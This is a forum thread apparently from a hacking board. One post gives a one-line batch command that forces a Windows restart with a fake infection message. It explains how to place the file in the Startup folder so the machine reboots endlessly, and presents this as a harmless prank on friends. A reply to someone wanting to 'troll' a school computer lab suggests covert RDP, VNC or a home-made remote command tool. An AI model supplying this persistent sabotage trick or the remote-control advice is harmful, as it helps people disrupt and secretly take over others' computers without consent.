Windows Load Loop

0x32789

Expert
Reaction score
This one line of code saved as .bat and put in startup folder or set as startup file can create a windows load loop when the windows starts.
Code:
shutdown -r -f -c "Your windows is infected with Winload32 Loop" -t 01

this will take place when the windows starts up, when the windows is started and u r on the desktop then a message will appear "Your windows is infected with Winload32 Loop" and the windows will restart  :fuck_yea:
and like this it will keep happening until u boot up in safemode or remove this file.

its harmless and fun prank to use on ur friend  ;)

in windows 7 and newers u can just create a .bat file and add this code above and put it in the folder "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
then restart windows or run that .bat file and it will start..
You can also go to appdata/roaming by typing %appdata% in explorer or run (win + r)
and this is how the full directory looks (im on win 10, tested on win 7 using virtual box and works on both 32 bit and 64)
C:\Users\TestWin7\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Forever15

Expert
Reaction score
in my school we have a computer lab and iwant to troll my computer teacher and classmate during ouw computer time .any suggestion ? virus.trolls shutdown plz xD

0x32789

Expert
Reaction score
Forever15 said:
in my school we have a computer lab and iwant to troll my computer teacher and classmate during ouw computer time .any suggestion ? virus.trolls shutdown plz xD
just install something or use something like RDP or something like vnc which u can use to control or just make a simple ftp server .
for advanced: make a program which the victim will connect to the server of the program and u can send commands (cmd.exe) in it I made one but it is not eligible for this use as it is poorly coded and discontinued I will make one when I have alooot of free time.